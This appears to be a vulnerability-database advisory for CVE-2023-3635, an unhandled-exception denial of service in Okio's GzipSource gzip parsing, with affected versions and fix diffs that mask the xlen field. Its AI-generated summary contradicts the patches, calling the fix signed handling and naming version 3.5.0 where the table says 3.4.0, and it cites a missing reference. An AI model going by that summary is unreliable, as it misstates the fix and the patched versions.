VYPR
← All advisories
Moderate severityOSV Advisory· Published Jul 12, 2023· Updated Oct 23, 2024

Okio GzipSource unhandled exception Denial of Service

CVE-2023-3635

Description

GzipSource does not handle an exception that might be raised when parsing a malformed gzip buffer. This may lead to denial of service of the Okio client when handling a crafted GZIP archive, by using the GzipSource class.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Unhandled exception in Okio's GzipSource when parsing malformed gzip extra field can cause denial of service.

Vulnerability

The vulnerability resides in Okio's GzipSource class, which fails to properly handle an exception raised when parsing a malformed gzip buffer. Specifically, the gzip extra field length (xlen) is interpreted as an unsigned short, but values greater than 0x7fff can cause unexpected behavior or exceptions that are not caught, leading to application crashes or resource exhaustion [2][4].

Exploitation

An attacker can exploit this by crafting a malicious GZIP archive with an oversized or otherwise malformed extra field. When an application uses GzipSource to decompress such an archive, the unhandled exception can halt processing. No authentication is required; the attack can be delivered via any mechanism that provides the archive to the vulnerable Okio client, such as file uploads, network streams, or bundled resources [3].

Impact

Successful exploitation results in a denial of service condition, where the Okio client becomes unresponsive or terminates abnormally. This can affect any service or application relying on Okio for GZIP decompression, potentially causing cascading failures in systems that process untrusted GZIP data [3].

Mitigation

The issue is fixed in Okio versions 3.5.0 and later, which include proper handling of the xlen field by treating it as a signed short as per the gzip specification [4]. Users should update to the latest version and ensure applications using GzipSource validate or sanitize incoming GZIP data [2][3].

References
  1. Fix a bug where xlen larger than 0x7fff was rejected (1.x) by xstefank · Pull Request #1334 · square/okio
  2. NVD - CVE-2023-3635
  3. Fix a bug where xlen larger than 0x7fff was rejected by swankjesse · Pull Request #1280 · square/okio

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
com.squareup.okio:okioMaven
>= 2.0.0-RC1, < 3.4.03.4.0
com.squareup.okio:okioMaven
< 1.17.61.17.6
com.squareup.okio:okio-jvmMaven
>= 2.0.0-RC1, < 3.4.03.4.0

Affected products

1
  • Square/OkioOSV
    Range: 2.2.2, 2.4.1, okio-parent-0.5.0, …

Patches

2
b4fa875dc249

Fix a bug where xlen larger than 0x7fff was rejected (#1334)

https://github.com/square/okioMartin StefankoOct 1, 2023via ghsa
commit
2 files changed · +16 2
  • okio/src/main/java/okio/GzipSource.java+1 1 modified
    @@ -127,7 +127,7 @@ private void consumeHeader() throws IOException {
     if (((flags >> FEXTRA) & 1) == 1) {
       source.require(2);
       if (fhcrc) updateCrc(source.buffer(), 0, 2);
-      int xlen = source.buffer().readShortLe();
+      int xlen = source.buffer().readShortLe() & 0xffff;
       source.require(xlen);
       if (fhcrc) updateCrc(source.buffer(), 0, xlen);
       source.skip(xlen);
  • okio/src/test/java/okio/GzipSourceTest.java+15 1 modified
    @@ -15,9 +15,11 @@
  */
 package okio;
 
+import org.junit.Test;
+
+import java.io.ByteArrayOutputStream;
 import java.io.IOException;
 import java.util.zip.CRC32;
-import org.junit.Test;
 
 import static okio.Util.UTF_8;
 import static org.junit.Assert.assertEquals;
@@ -182,6 +184,18 @@ private void assertGzipped(Buffer gzipped) throws IOException {
     }
   }
 
+  @Test public void extraLongXlen() throws Exception {
+    int xlen = 0xffff;
+    Buffer gzippedSource = new Buffer()
+        .write(gzipHeaderWithFlags((byte) 0x04));
+    gzippedSource.writeShort((short) xlen);
+    gzippedSource.write(new byte[xlen]);
+    gzippedSource.write(ByteString.decodeHex("f3c8540400dac59e7903000000"));
+
+    Buffer gunzipped = gunzip(gzippedSource);
+    assertEquals("Hi!", gunzipped.readUtf8());
+  }
+
   private ByteString gzipHeaderWithFlags(byte flags) {
     byte[] result = gzipHeader.toByteArray();
     result[3] = flags;
81bce1a30af2

Fix a bug where xlen larger than 0x7fff was rejected (#1280)

https://github.com/square/okioJesse WilsonJun 22, 2023via ghsa
commit
2 files changed · +19 5
  • okio/src/jvmMain/kotlin/okio/GzipSource.kt+1 1 modified
    @@ -117,7 +117,7 @@ class GzipSource(source: Source) : Source {
     if (flags.getBit(FEXTRA)) {
       source.require(2)
       if (fhcrc) updateCrc(source.buffer, 0, 2)
-      val xlen = source.buffer.readShortLe().toLong()
+      val xlen = (source.buffer.readShortLe().toInt() and 0xffff).toLong()
       source.require(xlen)
       if (fhcrc) updateCrc(source.buffer, 0, xlen)
       source.skip(xlen)
  • okio/src/jvmTest/kotlin/okio/GzipKotlinTest.kt+18 4 modified
    @@ -23,14 +23,28 @@ import org.junit.Test
 class GzipKotlinTest {
   @Test fun sink() {
     val data = Buffer()
-    val gzip = (data as Sink).gzip()
-    gzip.buffer().writeUtf8("Hi!").close()
+    (data as Sink).gzip().buffer().use { gzip ->
+      gzip.writeUtf8("Hi!")
+    }
     assertEquals("1f8b0800000000000000f3c8540400dac59e7903000000", data.readByteString().hex())
   }
 
   @Test fun source() {
     val buffer = Buffer().write("1f8b0800000000000000f3c8540400dac59e7903000000".decodeHex())
-    val gzip = (buffer as Source).gzip()
-    assertEquals("Hi!", gzip.buffer().readUtf8())
+    (buffer as Source).gzip().buffer().use { gzip ->
+      assertEquals("Hi!", gzip.readUtf8())
+    }
+  }
+
+  @Test fun extraLongXlen() {
+    val xlen = 0xffff
+    val buffer = Buffer()
+      .write("1f8b0804000000000000".decodeHex())
+      .writeShort(xlen)
+      .write(ByteArray(xlen))
+      .write("f3c8540400dac59e7903000000".decodeHex())
+    (buffer as Source).gzip().buffer().use { gzip ->
+      assertEquals("Hi!", gzip.readUtf8())
+    }
   }
 }

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

9

News mentions

0

No linked articles in our index yet.